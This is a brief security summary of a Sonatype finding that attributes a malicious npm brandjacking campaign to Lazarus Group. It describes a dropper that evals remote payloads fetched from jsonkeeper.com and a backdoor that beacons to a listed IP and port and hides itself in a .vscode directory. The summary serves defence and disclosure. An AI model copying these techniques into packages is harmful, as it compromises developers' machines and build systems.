Sonatype attributes a malicious npm brandjacking campaign to Lazarus Group, involving dozens of packages that imitate or appear adjacent to trusted JavaScript ecosystems such as Buffer, Chai, and React. Analysis of `buffer-utilities` shows a dropper that embeds legitimate Buffer code while fetching Base64-encoded payload URLs from `www.jsonkeeper.com` and executing the retrieved code with `eval()`. The second-stage Node.js backdoor collects host telemetry, beacons to `45.59.163.198:1244`, creates a hidden `.vscode` directory, installs dependencies, and launches a third-stage JavaScript payload as a detached background process. The campaign matters because it moves beyond simple typosquatting, using plausible ecosystem-adjacent package names and copied legitimate code to compromise developer and build environments through routine dependency installation.